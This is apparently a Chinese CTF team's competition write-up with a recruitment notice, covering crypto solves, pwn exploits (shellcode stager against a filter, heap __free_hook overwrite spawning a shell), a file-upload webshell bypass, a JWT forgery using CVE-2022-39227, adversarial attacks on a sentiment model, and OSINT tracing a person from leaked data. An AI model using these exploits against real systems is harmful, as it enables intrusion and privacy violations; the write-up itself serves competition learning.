2025年4月2日22:24:36评论77 views字数 30580阅读101分56秒阅读模式

-联合战队|共同成长-

2025数字中国初赛 WP

招新

N0wayBack

-招新说明-

招新要求

· CTF赛龄1年以上

· 热爱网络安全，喜欢CTF

· 无人际交流障碍，不以阴阳怪气为乐；乐于奉献、热爱分享，愿意提升自己同时帮助他人

· 时间允许参加各类赛事，服从战队管理与安排

· 各类比赛获奖者、能力出众者视情况考量

· 未参与其他高校联队

· 大一同学视情况放宽资历要求

联系方式

发送简历于邮箱

· 简历邮箱：[email protected]

聘

crypto-AS（rec）

题目用到的AS其实就是等差数列的求和函数，猜测AS(a, b, c)表示以a为起点b为终点一共c个元素的等差数列，因此题目需要满足的式子为：n1**2 + n1 = 2*a*n2**2，其中a=0x149f，并且(n1, n2)范围均大于2**a。我们将这个式子化成Pell方程的形式：(2*n1+1)**2 - 8an2**2 = 1，然后可以通过连分数求解一个特解，进而遍历所有可能的解，找到满足条件的(n1, n2)即可

from sage.allimport *
from pwn import *
from hashlib import md5

'''
a = 0x149f
n1**2 + n1 - 2*a*n2**2 = 0
(n1+1/2)**2 - 2*a*n2**2 = 1/4
(2*n1+1)**2 - 8*a*n2**2 = 1
x := 2*n1+1
y := n2
d := 8*a
->
x**2 - d*y**2 = 1
'''

defsolve_pell(N, numTry = 1000):
    cf = continued_fraction(sqrt(N))
    for i inrange(numTry):
        denom = cf.denominator(i)
        numer = cf.numerator(i)
        if numer**2 - N * denom**2 == 1:
            return numer, denom
    returnNone, None


deffunc(x0, y0, limit):
    x, y = ZZ(x0), ZZ(y0)
    whileTrue:
        x, y = x*x0 + d*y*y0, x*y0 + y*x0
        assert x**2 - d*y**2 == 1
        if x % 2 == 1and x > limit and y > limit:
            break
    return x, y

a = 0x149f
d = 8*a
limit = 2**a

x0, y0 = solve_pell(d)
x, y = func(x0, y0, limit)
n1 = x // 2
n2 = y

io = remote(*"XXXXXX XXXXX".split())
io.sendlineafter(b'choice:', b'2')
io.sendlineafter(b'n1~', str(n1).encode())
io.sendlineafter(b'n2~', str(n2).encode())
io.interactive()
'''
You get the flag!
b'Verify success!Your username[ADMIN-JM], your password[JM001x!]~'
'''
username, password = b'ADMIN-JM', b'JM001x!'

flag = md5(username + b'+' + password).hexdigest()
print(flag)
# b7133d84297c307a92e70d7727f55cbc

pwn-scsc(heshi)

利用程序漏洞获取info_sec文件中数据信息，提交第11行第2列数据

拿到scsc二进制文件时，发现是静态编译，没有一个库函数，且符号表缺失，导致库函数都没有名字

这里用到了逆向的技巧，有三种方式可以恢复部分符号表

1. 使用不同版本的sig文件，尝试恢复
2. 使用bindiff，使用不同的libc文件，比对库函数的机器码，恢复函数名
3. 使用finger插件（需联网）

其中我个人认为效果最理想的是finger插件，这场比赛也不断网，就用它了。它不止能识别libc，没有它，我都不知道还用到了C++的库，这里展示恢复后的效果

该程序是一个AES解密函数套shellcode执行器并禁用了部分可见字符，需要我们加密传输不含有过滤字符的shellcode

这里用来一种最简单的办法，自己再用shellcode创造一个read，并跳转，再输入一个普通的shellcode即可。这里的可见字符过滤限制了“sh”和各种64位寄存器操作。所以我使用了32位寄存器，轻松绕过，开启sys_read，注入shellcode，getshell

from pwn import *
from std_pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

defgetProcess(ip,port,name):
    global p
    iflen(sys.argv) > 1and sys.argv[1] == 'r':
        p = remote(ip, port)
        return p
    else:
        p = process(name)
        return p
    
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
rc = lambda x: p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
ita = lambda: p.interactive()
slc = lambda: asm(shellcraft.sh())
uu64 = lambda x: u64(x.ljust(8, b''))
uu32 = lambda x: u32(x.ljust(4, b''))
# return sl, sd, sa, sla, rc, rl, ru, ita, slc, uu64, uu32

defaes_ecb_encrypt(plaintext):
    print(plaintext)
    for c inb"0MOyhjlcit1ZkbNRnCHaG":
        if c in plaintext:
            print(f"{chr(c)} in it !")

    # 将十六进制字符串密钥转换为字节
    key = b"862410c4f93b77b4"

    # 创建AES加密器
    cipher = AES.new(key, AES.MODE_ECB)

    # 对明文进行填充并加密
    padded_plaintext = pad(plaintext, AES.block_size)
    ciphertext = cipher.encrypt(padded_plaintext)

    # 将密文转换为十六进制字符串并返回

    return ciphertext

shellcode='''
push    rsp
pop     rsi
mov     edi,0       
mov     edx,0xff
push    rdi 
pop     rax
syscall
jmp rsp
'''

# 01ayhcjitkbn MOlZNRCHG
p=getProcess("47.117.42.74",32846,'./scsc')
context(os='linux', arch='amd64', log_level='debug',terminal=['tmux','splitw','-h'])
elf=ELF("./scsc")

gdba()

payload=asm(shellcode)

sa("magic data:",aes_ecb_encrypt(asm(shellcode)))
sl(asm(shellcraft.sh()))
ita()

pwn-boh(duck0123)

利用程序漏洞获取info_sec文件中数据，提交第8行第2列数据

#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
io=process('./boh')
#io=remote('xxxx',xxx)
libc=ELF('./libc-2.31.so')

defchoice(a):
        io.sendlineafter('>>>>>> ',str(a))

defadd(a):
        choice(1)
        io.sendlineafter('storage:',str(a))

defedit(a,b):
        choice(4)
        io.sendlineafter(':',str(a))
        io.sendafter(':',b)

defshow(a):
        choice(3)
        io.sendlineafter('data: ',str(a))

defdelete(a):
        choice(2)
        io.sendlineafter('space: n',str(a))

add(0x500)
add(0xf0)
add(0xf0)
delete(0)
show(0)

leak=u64(io.recvuntil('x7f')[-6:]+'x00x00')
libc_base=(leak-libc.sym['_IO_2_1_stdin_'])&0xfffffffffffff000
libc.address=libc_base
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']

delete(1)
edit(1,'x00'*0x10+'n')
delete(1)
edit(1,p64(free_hook_addr)+'n')
add(0xf0)
add(0xf0)
edit(4,p64(system_addr)+'n')
edit(2,'/bin/shx00n')

delete(2)
io.interactive()

crypto-RSSA(rec)

一家金融科技公司设计了一种新的数据加密方案，用于保护用户的交易信息，并进行风险分散。该方案为改进的RSA算法，其中引入了某数论问题。安全研究员在测试该方案时，发现存在潜在的漏洞，可能导致密钥泄露。现提供一段被加密的数据，以及相关的加密参数，请进行分析，并获取信用卡以及有效期数据，提交md5(card-exp_date)，如card：123，exp_date：11-11，则提交：ed5f4a22d5fdc71d97e36a32bb094fae。

题目第一部分是朴素的RSA泄漏p高位场景，可以使用coppersmith攻击攻破RSA，得到hint，补全第二部分的参数

第二部分是标准的ahssp问题，结合论文https://eprint.iacr.org/2020/461.pdf实施正交格攻击恢复小矩阵，然后求解矩阵方程得到s即可

from sage.allimport *
from Crypto.Util.number import *
from hashlib import md5

a = 0xb0ee0627166579753f354ced7cdb6701a5ebbfaec3cd6af76decc33f95a765bd7e5f758e2076c42a76f5af867152757b97242034693f309973ffdebe4a5ce3dd822260dfa8a8d51f9aac7550474a3a4fe37ecea6cdc23b0cbba5aa6d0d93e9b10000000000000000000000000000000000000000000000000000000000000000
n = 0x6b9f0bf43d3e9b3278d52b3cfaafadf9449048f8297fedf8f8909a030156a23c68552b5379adbf32fd9584aa42f694c8227d275f40391c7872400eda97c2b79f8349af6492c7b6ac12bae303cee1eb9b6059e5891a6535ca8310e9ba145b7b4d403d8e666e5a55a94e5f7dabe22b80032e936233d7a1f0e96b95aeb4249b8ea34ef8bf422ce9f725844478ee15b739dd70cc6e2c0bd0cb24d7d14baf66c5aca2023c24339d3b90eecb0e2568c148d438a5ce84270ce11159e3aa4d48ac8b2185c2fe8cb328e8f80602c9d7ae49799538154d325700349bb7cd2fb694fb9f8cbcf2ebced8f6c29a05c64aa78a036416c28e6e7b937a371c98feed2d826ca9ed63
c = 0x4dba2f194b97d4dac89548c035bf18d708fb9edfd6b7706e6d7871c6129931cde88718bdcbd1e8410f1e7a4c709bdf9d31572ee371816e1d11e15e491d843a7277684202bc45e23f9f1b2e3a808bde94343a47a6a22b339aa651568ff55994260039defd790c0eb0abcf90730ecf3e097316ca87e607974544866a54d23aaaf2d089e346a68437a55afc4750b9ea1d7efcb7a6fd55c694a168f186531f0e8abb2dee73ff50ebeb2a39e1e9842013dc410e09987783cdd8e234a55388fffc025b1fe3b4036d6181ac8e6ec4d9c0822c012ac861b242b2c94433209369d0f271110d007202118e566646940f12179ee05b4e1b3c1871f09a4dbfe381d625c1166a

R, x = PolynomialRing(Zmod(n), 'x').objgen()
f = x + a
ans = f.small_roots(X=2**256, beta=0.4, epsilon=0.03)
p = a + int(ans[0])
q = n // p
d = inverse_mod(0x10001, n-p-q+1)
m = pow(c, d, n)
print(long_to_bytes(m))
# Ohhhh~You get hint!!!Keep in mind~[n = 45]

p = 124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
e = XXXXXXX
h = XXXXXXX
n, m = 45, 195
K = 2**1024
L = block_matrix(ZZ, [
    [1, K*matrix(h).T, K*matrix(e).T],
    [0, K*p, 0],
    [0, 0, K*p]
]).LLL()
L = block_matrix(ZZ, [
    [1, K*L[:m-n,:m].T]
]).LLL()
L = L[:n,:m]

defcheck(v):
    returnset(v.list()) == {0, 1} orset(v.list()) == {-1, 0}
Lv = [v for v in L if check(v)]
for vi in Lv:
    for vj in L:
        v = vi + vj
        if check(v) and v notin Lv:
            Lv.append(vector(list(map(abs, v))))
        v = vi - vj
        if check(v) and v notin Lv:
            Lv.append(vector(list(map(abs, v))))
A = block_matrix(GF(p), [
    [matrix(Lv)],
    [-matrix(e)]
])
b = vector(h)
ss = A.solve_left(b)
print(ss)
flag = long_to_bytes(int(ss[-1]))
print(flag)
# card:4111111111111123,exp_date:2025-12

card = b'4111111111111123'
exp_date = b'2025-12'
flag = md5(card + b'-' + exp_date).hexdigest()
print(flag)
# a01f461a6ca2936342b269b55e8de03e

ez_upload（yiyi）

某服务器上存放着加密数据使用的RSA密钥文件，管理员在进行服务器站点维护时没有及时对存在漏洞的测试站点进行修复，请提交RSA密钥所在的路径（提交样式：如文件所在路径为/var/www,则提交答案为/var/www）

phtml绕过文件名限制（文件内容也有检测，不允许出现PHP，不过上传后看 .htaccess 发现 php3 也能绕过）

蚁剑连接

api接口认证（xuanSAMA、chleynx）

加个.绕过了中间件对/get_jwt路由的验权

拿到guest的jwt

根据返回猜测为python-jwt尝试使用CVE-2022-39227伪造jwt

def topic(name):
    topic = "eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDMzMjAzMDMsImdyb3VwaW5nIjoiZ3Vlc3QiLCJpYXQiOjE3NDMzMTY3MDMsImp0aSI6IkJVZVd4VEJUUnNmcnRPM0ZsZEhZUWciLCJuYmYiOjE3NDMzMTY3MDMsInVzZXIiOiJjaW1lciJ9.Y5lUuRh94_66y7kCcOoYeHNjp_a4fhjEU1XgIbx9XYKOXeSGF90NJEB56DOGOlRRK3XfHsDQKbk-jqp_RE20j0i20q-Uw6Ny-YZLNYBGdmw9TwesuMMtmxpEErLgiSrIPj8NTIEvUAbZ6HUpSVfAEZD-bG2lZqseMDptz9FvulbTYxRmRkS_dAN63efbB4RMSmqHqptUtRHxDzI1dPAqJM18WFfIGiok1-aIwjilrNIC-UDq-DqRkGoYTYPMphq0B7k5RSwZvYmO_nvETkYRJ8lYccP5-7fWgIqZM2WD46QY8kQ5s0yVpmwuCcaFKDmKXeSxIFJM_GR1b2uXB-34jw"
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    # print(parsed_payload)
    parsed_payload["grouping"] = "admincimer"
    parsed_payload["user"] = "admincimer"
    # print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '

运行获得敏感信息

答案：

14573688064

模型安全

数据预处理安全

数据标注与完整性校验（Cain）

针对在线团购平台提供的原始用户评论数据，爬取用户评论数据，进行情感标注（正面/负面），并基于用户ID、用户名、手机号生成MD5签名以校验完整性。按附件模板和任务书要求提交处理后的submit_1.csv文件进行评分。

一开始测了很多，比如FastText、SnowNLP、Bert等模型，但是预训练的都不太好，找到了JD电商的数据集，但是时间不太够了，所以最后还是用了ChatGpt3.5

import requests
from bs4 import BeautifulSoup
import torch
from transformers import BertTokenizer, BertForSequenceClassification
from hashlib import md5
from tqdm import trange

openai_endpoint = 
openai_api_key = 

headers = {
    "Authorization": f"Bearer {openai_api_key}",
    "Content-Type": "application/json"
}

data = {
"model": "gpt-3.5-turbo",
"messages": [
    {
      "role": "system",
      "content": """你是一个情感分析专家，你的职责是分析用户对商品的评价，并给出情感分析结果，请直接返回数字，0为负面，1为正面，不要返回任何其他内容"""
    },
    {
      "role": "user",
      "content": ""
    }
  ]
}

defclassify_text(text):
    data["messages"][1]["content"] = text
    response = requests.post(openai_endpoint, headers=headers, json=data)
    return response.json()["choices"][0]["message"]["content"]

ans = []

for i in trange(1, 501):
    url = f"http://47.117.190.73:32823/index.php?controller=product&action=detail&id={i}"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")
    reviews = []
    review_items = soup.find_all("div", class_="review-item")
    
    for item in review_items:
        user_id = item.find("span", class_="user-id").text.replace("用户ID：", "")
        username = item.find("span", class_="reviewer-name").text.replace("用户名：", "")
        phone = item.find("span", class_="reviewer-phone").text.replace("联系电话：", "")
        content = item.find("div", class_="review-content").text.strip()
        
        review_info = {
            "user_id": user_id,
            "username": username,
            "phone": phone,
            "content": content.replace(" ", "")
        }
        
        reviews.append(review_info)
    
    for review in reviews:

        c = classify_text(review['content'])
        try:
            c = int(c)
        except:
            print(c, review['content'])
            c = 0
        ans.append([review['user_id'], c, md5((review['user_id'] + review['username'] + review['phone']).encode()).hexdigest()])

sorted_ans = sorted(ans, key=lambda x: int(x[0]))

withopen('flag.csv', 'w', newline='') as csvfile:
    csvfile.write("user_id,label,signaturen")
    for item in sorted_ans:
        csvfile.write(f"{item[0]},{item[1]},{item[2]}n")

数据清洗与特征工程(chleynx、Cain)

针对在线团购平台提供的商品数据，您需要爬取后进行数据清洗（处理异常销量）和特征工程（提取分类编号、统计评论数），按附件模板和任务书要求提交处理后的submit_2.csv文件进行评分。

Exp(chleynx）

import requests
from bs4 import BeautifulSoup
import csv
import re
import time
import random

# 基础URL
BASE_URL = "http://47.117.190.214:32920"

# 分类关键词映射
category_keywords = {
    1: ["手机", "phone", "华为", "iphone", "xiaomi", "苹果", "三星", "oppo", "vivo", "智能机", "联想", "nokia", "戴尔", "lenovo"],
    2: ["母婴", "奶瓶", "尿布", "婴儿", "宝宝", "玩具", "奶粉", "童装", "儿童"],
    3: ["家居", "家具", "沙发", "床", "桌子", "椅子", "茶几", "柜子", "装饰"],
    4: ["书籍", "小说", "文学", "教材", "杂志", "图书", "书", "作者", "阅读"],
    5: ["蔬菜", "西红柿", "黄瓜", "胡萝卜", "白菜", "花菜", "韭菜", "青菜", "菠菜"],
    6: ["厨房用具", "锅", "碗", "筷子", "刀", "砧板", "铲", "勺"],
    7: ["办公", "打印机", "复印机", "笔", "纸", "文件夹", "办公室"],
    8: ["水果", "苹果", "香蕉", "梨", "橙子", "草莓", "芒果", "葡萄", "樱桃", "桃"],
    9: ["宠物", "猫", "狗", "鱼", "宠物", "饲料", "猫粮", "狗粮", "宠物用品"],
    10: ["运动", "健身", "足球", "篮球", "网球", "跑步", "游泳", "体育"],
    11: ["热水器", "恒温", "速热", "防干烧", "卫生间", "洗浴"],
    12: ["彩妆", "口红", "粉底", "眼影", "眼线", "化妆", "美妆", "腮红"],
    13: ["保健品", "维生素", "蛋白粉", "营养", "保健", "补充剂"],
    14: ["酒水", "啤酒", "红酒", "白酒", "葡萄酒", "威士忌", "伏特加"],
    15: ["玩具乐器", "玩具", "琴", "吉他", "钢琴", "电子琴", "鼓", "乐器"],
    16: ["汽车", "车", "轮胎", "方向盘", "座椅", "汽油", "柴油"],
    17: ["床上用品", "床单", "被子", "枕头", "床垫", "床笠", "被套", "枕套"],
    18: ["洗护用品", "洗发水", "沐浴露", "洗面奶", "护肤品", "防晒", "洁面", "面膜", "护发素", "洗发"],
    19: ["五金", "工具", "螺丝", "螺母", "扳手", "锤子"],
    20: ["户外", "露营", "帐篷", "睡袋", "登山", "徒步", "旅行"],
    21: ["珠宝", "项链", "戒指", "手镯", "耳环", "金", "银", "玉"],
    22: ["医疗器械", "血压计", "体温计", "血糖仪", "听诊器", "轮椅"],
    23: ["花卉园艺", "花", "植物", "盆栽", "花盆", "园艺", "种子", "花卉"],
    24: ["游戏", "电子游戏", "游戏机", "游戏手柄", "游戏光碟"],
    25: ["园艺", "园艺工具", "花园", "种植", "培育", "修剪", "盆栽"]
}

# 判断商品分类的函数
defget_category_id(product_name):
    product_name = product_name.lower()
    scores = {cat_id: 0for cat_id inrange(1, 26)}
    
    # 为每个分类计算匹配分数
    for cat_id, keywords in category_keywords.items():
        for keyword in keywords:
            if keyword.lower() in product_name:
                scores[cat_id] += 1
    
    # 特殊规则处理
    if"热水器"in product_name:
        return11
    if"洗发"in product_name or"护发"in product_name:
        return18
    if"水果"in product_name or"草莓"in product_name or"香蕉"in product_name:
        return8
    if"书"in product_name andlen(product_name) > 10:
        return4
    if"phone"in product_name.lower() or"手机"in product_name:
        return1
    
    # 返回得分最高的分类
    max_score = max(scores.values())
    if max_score > 0:
        for cat_id, score in scores.items():
            if score == max_score:
                return cat_id
    
    # 如果没有明确匹配，尝试一些启发式规则
    if"手机"in product_name or"phone"in product_name.lower():
        return1
    elif"婴"in product_name or"童"in product_name:
        return2
    elif"书"in product_name or"文学"in product_name:
        return4
    elif"蔬菜"in product_name:
        return5
    elif"水果"in product_name:
        return8
    elif"热水器"in product_name:
        return11
    elif"彩妆"in product_name or"化妆"in product_name:
        return12
    
    # 默认分类（应该很少用到）
    return product_name

# 获取商品列表页
defget_product_list():
    products = []
    page = 1
    max_pages = 84# 根据页面.html中的分页信息确定
    
    while page <= max_pages:
        url = f"{BASE_URL}/index.php?controller=home&action=index&page={page}"
        try:
            response = requests.get(url)
            soup = BeautifulSoup(response.text, 'html.parser')
            
            # 提取商品信息
            product_cards = soup.select('.product-card')
            ifnot product_cards:
                break
                
            for card in product_cards:
                product_id = card.get('data-id')
                ifnot product_id:
                    product_id = card.select_one('.product-id').text.strip().replace('商品ID: ', '')
                
                product_name = card.select_one('.product-name').text.strip()
                
                # 提取销量
                sales_text = card.select_one('.product-sales').text.strip().replace('月销量: ', '').replace('件', '')
                try:
                    sales = int(sales_text)
                    if sales < 0:  # 处理负数销量
                        sales = 0
                except (ValueError, TypeError):
                    sales = 0# 处理无法转换为整数的情况
                
                # 确定分类ID
                category_id = get_category_id(product_name)
                
                products.append({
                    'product_id': int(product_id),
                    'product_name': product_name,
                    'sales': sales,
                    'category_id': category_id,
                    'reviews_number': 0# 默认为0，之后会更新
                })
            
            print(f"已处理第 {page} 页，获取 {len(product_cards)} 个商品")
            page += 1
            # 添加延迟，避免请求过于频繁
            
        except Exception as e:
            print(f"获取第 {page} 页时出错: {e}")
            # 如果出错，尝试再次请求
            continue
    
    # 按商品ID排序
    products.sort(key=lambda x: int(x['product_id']))
    return products

# 获取评论数量
defget_reviews_count(product_id):
    url = f"{BASE_URL}/index.php?controller=product&action=detail&id={product_id}"
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')
        
        # 查找评论项
        review_items = soup.select('.review-item')
        returnlen(review_items)
    except Exception as e:
        print(f"获取商品 {product_id} 评论数时出错: {e}")
        return0

# 主函数
defmain():
    print("开始爬取商品数据...")
    products = get_product_list()
    
    print(f"共获取 {len(products)} 个商品信息")
    print("开始获取评论数量...")
    
    # 获取评论数量
    total_reviews = 0
    products_with_reviews = 0
    
    for i, product inenumerate(products):
        reviews_count = get_reviews_count(product['product_id'])
        products[i]['reviews_number'] = reviews_count
        
        # 累计评论数据
        total_reviews += reviews_count
        if reviews_count > 0:
            products_with_reviews += 1
            
        if (i+1) % 10 == 0:
            print(f"已处理 {i+1}/{len(products)} 个商品的评论数")
        # 添加延迟，避免请求过于频繁
    
    # 输出评论统计信息
    print(f"n===== 评论统计 =====")
    print(f"总评论数: {total_reviews}")
    print(f"有评论的商品数: {products_with_reviews}")
    print(f"平均每个商品的评论数: {total_reviews / len(products):.2f}")
    
    # 确保所有商品ID从1到500，如果缺失则补充
    product_ids = set(p['product_id'] for p in products)
    for pid inrange(1, 501):
        if pid notin product_ids:
            products.append({
                'product_id': pid,
                'product_name': '',
                'sales': 0,
                'category_id': 0,  # 默认分类
                'reviews_number': 0
            })
    
    # 再次排序，确保按商品ID升序
    products.sort(key=lambda x: int(x['product_id']))
    
    # 将数据写入CSV文件
    withopen('submit_222.csv', 'w', encoding='utf-8', newline='') as csvfile:
        fieldnames = ['product_id', 'sales', 'category_id', 'reviews_number']
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        
        for product in products:
            writer.writerow({
                'product_id': product['product_id'],
                'sales': product['sales'],
                'category_id': product['category_id'],
                'reviews_number': product['reviews_number']
            })
    
    print("数据已成功写入submit_2.csv文件")

if __name__ == "__main__":
    main()

再加上

就有满分

Cain：上面的思路还是太吃操作和手法了，有没有简单又强势的exp？有的兄弟，有的

分类太麻烦了，直接调用的大模型，给定prompt让他输出，反正3.5不是很贵

# -*- coding: utf-8 -*-

import requests
from bs4 import BeautifulSoup
import json
from tqdm import tqdm

openai_endpoint = ""
openai_api_key = ""

headers = {
    "Authorization": f"Bearer {openai_api_key}",
    "Content-Type": "application/json"
}

data = {
"model": "gpt-3.5-turbo",
"messages": [
    {
      "role": "system",
      "content": """你是一个商品分类助手,你的职责是帮助用户完成商品分类，下面是你的商品分类清单，你需要将客户告诉你的商品分类到对应的分类中，
1->⼿机, 2->⺟婴⽤品, 3->家居, 4->书籍, 5->蔬菜, 6->厨房⽤具, 7->办公, 8->⽔果, 9->宠物, 10->运动, 11->热⽔器, 12->彩妆, 13->保健品, 14->酒⽔, 15->玩具乐器, 16->汽⻋, 17->床上⽤品, 18->洗护⽤品, 19->五⾦, 20->⼾外, 21->珠宝, 22->医疗器械, 23->花卉园艺, 24->游戏, 25->园艺
注意！请直接返回数字，不要返回任何其他内容"""
    },
    {
      "role": "user",
      "content": ""
    }
  ]
}

defclassify_product(product_description):
    data["messages"][1]["content"] = product_description
    response = requests.post(openai_endpoint, headers=headers, data=json.dumps(data))
    return response.json()["choices"][0]["message"]["content"]

flag = open("flag.csv", "w")

flag.write("product_id,sales,category_id,reviews_numbern")

for i in tqdm(range(1, 501)):
    url = f"http://47.117.190.73:32823/index.php?controller=product&action=detail&id={i}"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")
    
    product_description = ""
    description_element = soup.select_one(".product-description p")
    if description_element:
        product_description = description_element.text.strip()
    
    monthly_sales = 0
    sales_element = soup.select_one("#productSales")
    if sales_element:
        try:
            monthly_sales = int(sales_element.text.strip())
        except ValueError:
            pass
    
    review_items = soup.find_all("div", class_="review-item")
    review_count = len(review_items)
    
    # print(classify_product(product_description))

    c = classify_product(product_description)
    try:
        c = int(c)
    except:
        c = c.split("->")[0]

    flag.write(f"{i},{0 if monthly_sales < 0 or monthly_sales is None else monthly_sales},{c},{review_count}n")

flag.close()

隐私保护与恶意检测

针对在线团购平台提供的用户数据，你需要爬取数据后进行数据脱敏与恶意代码检测，在数据脱敏环节，你需要对手机号码按照对应的规则进行脱敏替换。在恶意代码检测环节，你需要对评论user_agent进行SQL注入/XSS/命令执行等恶意代码检测。按附件模板和任务书要求提交处理后的submit_3.csv文件进行评分。

代码呢我代码谁给我删了

总体思路和上面差不多

样本对抗与数据投毒

对抗样本攻击（Cain）

分析预训练完成的服装评论情感分析模型⽂件，通过在原始评论后追加最少字符的扰动⽂本（对

抗样本），使得模型对修改后的评论情感预测结果发⽣翻转（正⾯变负⾯，或负⾯变正⾯），最⼤化

模型的预测错误率。

你的任务是根据提供的csv⽂件中的1000条原始⽂本数据，⽣成对应数量的对抗样本，每条对抗样

本在原始⽂本后添加≤5字符⽂本，使模型预测结果发⽣标签翻转（0→1或1→0），汇总并提交最佳对

抗样本submit.csv⾄平台验证，根据标签翻转率进⾏评分。

用了GCG去找对抗，效果还不错，代码部分时间不够了，理不清对应关系，写的比较冗杂

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
import joblib
import numpy as np

sentiment_model = joblib.load('sentiment_model.pkl')
tfidf_vectorizer = joblib.load('tfidf_vectorizer.pkl')

file = open('data.csv',mode='r',encoding='utf-8')
flag = open('flag.csv',mode='w',encoding='utf-8')
datas = file.readlines()[1:]
flag.write('sample_id,adversarial_examplesn')
for i,data inenumerate(datas):
    text = data.split(',')[1]
    original_prediction = int(data.split(',')[-1])

    if original_prediction == 0:
        vocab = tfidf_vectorizer.get_feature_names_out()
        max_iterations = 50
        suffix_tokens = []
        current_text = text

        for iteration inrange(max_iterations):
            best_token = None
            best_score = float('-inf')
            
            for token in np.random.choice(vocab, size=len(vocab)//4, replace=True):
                candidate_text = current_text + " " + token
                candidate_vector = tfidf_vectorizer.transform([candidate_text])
                candidate_score = sentiment_model.predict_proba(candidate_vector)[0][1]
                if candidate_score > best_score:
                    best_score = candidate_score
                    best_token = token

            if best_token:
                suffix_tokens.append(" " + best_token)
                current_text = current_text + " " + best_token
                
                # 检查是否成功反转
                current_vector = tfidf_vectorizer.transform([current_text])
                current_prediction = sentiment_model.predict(current_vector)[0]
                
                if current_prediction != original_prediction:
                    print(f"成功在第{iteration+1}次迭代后反转预测结果")
                    break
            else:
                print("无法找到合适的token来反转预测")
                break

        # 输出结果
        adversarial_text = current_text
        print(f"添加后缀: {''.join(suffix_tokens)}")
        print(f"对抗样本: {adversarial_text}")

        # 验证最终预测
        final_vector = tfidf_vectorizer.transform([adversarial_text])
        final_prediction = sentiment_model.predict(final_vector)
        print(f"最终预测结果: {final_prediction[0]}")
        print(f"原始预测结果: {original_prediction}")
        print(f'-------------------{i}---------------------')
        flag.write(f"{data.split(',')[0]},{''.join(suffix_tokens)}n")

    if original_prediction == 1:

        vocab = tfidf_vectorizer.get_feature_names_out()
        max_iterations = 50
        suffix_tokens = []
        current_text = text

        for iteration inrange(max_iterations):
            best_token = None
            best_score = float('inf') if original_prediction == 1elsefloat('-inf')
            
            for token in np.random.choice(vocab, size=len(vocab)//4, replace=False):
                candidate_text = current_text + " " + token
                candidate_vector = tfidf_vectorizer.transform([candidate_text])
                candidate_score = sentiment_model.predict_proba(candidate_vector)[0][1]
                
                if (original_prediction == 1and candidate_score < best_score) or 
                (original_prediction == 0and candidate_score > best_score):
                    best_score = candidate_score
                    best_token = token
            
            if best_token:
                suffix_tokens.append(" " + best_token)
                current_text = current_text + " " + best_token
                
                # 检查是否成功反转
                current_vector = tfidf_vectorizer.transform([current_text])
                current_prediction = sentiment_model.predict(current_vector)[0]
                
                if current_prediction != original_prediction:
                    print(f"成功在第{iteration+1}次迭代后反转预测结果")
                    break
            else:
                print("无法找到合适的token来反转预测")
                break

        # 输出结果
        adversarial_text = current_text
        print(f"添加后缀: {''.join(suffix_tokens)}")
        print(f"对抗样本: {adversarial_text}")

        # 验证最终预测
        final_vector = tfidf_vectorizer.transform([adversarial_text])
        final_prediction = sentiment_model.predict(final_vector)
        print(f"最终预测结果: {final_prediction[0]}")
        print(f"原始预测结果: {original_prediction}")
        print(f'-------------------{i}---------------------')
        flag.write(f"{data.split(',')[0]},{''.join(suffix_tokens)}n")

数据投毒攻击（Cain）

在限定投毒数据量的前提下，通过构造并注⼊精⼼设计的投毒样本，重新训练服装评论情感分析

模型，使得模型在关键验证集上的情感预测标签翻转率最⼤化。

你的任务是根据提供的在线数据投毒模型训练平台，构造并上传≤100条的投毒数据（每条≤20字

符），注⼊⾄原始训练数据中并调优训练超参数，使最终训练的模型在1000条验证数据上达到最⼤情

感标签翻转效果，导出并提交训练好的模型.zip⽂件⾄竞赛平台验证，根据标签翻转率进⾏评分。

哎，☝️🤓留一手

时间太紧张了，赛后做出来没法验证，不止增笑耳了

数据析

取证与溯源

第一问（yiyi）

运维人员误删除了一个重要的word文件，请通过数据恢复手段恢复该文件，文件内容即为答案。

数据恢复出重要文件.docx，flag藏在里面

第二问（G3rling）

服务器网站遭到了黑客攻击，但服务器的web日志文件被存放在了加密驱动器中，请解密获得该日志并将黑客ip作为答案提交。

将内存.7z文件解压后，将raw内存镜像挂载，搜索access.log日志文件

在 access.log.1741219200 中找到ip

114.10.143.92

第三问

经分析，黑客在攻击中窃取了一些重要信息，请分析web日志，获取黑客窃取的相关信息，并将黑客窃取的所有身份证号按照其姓名拼音首字母升序排序，并计算其32位小写md5作为答案提交（如zhangsan的身份证是110101199001011234，lisi的身份证是110101198505051234，zhangfei的身份证是110101199203031234，则最终顺序为110101198505051234110101199203031234110101199001011234，计算其32小写md5”9ac198054af03107b2452bee3091b9ef”就是答案）

数据泄露与社会工程

第一问：张华强的居住地和工作地名称（yiyi）

Important

• 工作地方一般为 **园区、 **大厦、**大楼

• 涉及的经纬度信息均不考虑转换

• 张某的生活习惯为：周一到周五从家打车去公司，周末无明显固定作息

• 被泄露方验证泄露的数据，确定了泄露日期的真实性，行程的时间具体时间被隐去

根据第三问的手机号码可以在某通的快递单数据中看到公司名称--博林科技

重新暴搜找到工作地名称

gpt写了个脚本大致统计经纬度

import os
import sqlite3
from collections import Counter
from tqdm import tqdm

defget_db_files(directory):
    """获取指定目录下所有 .db 文件"""
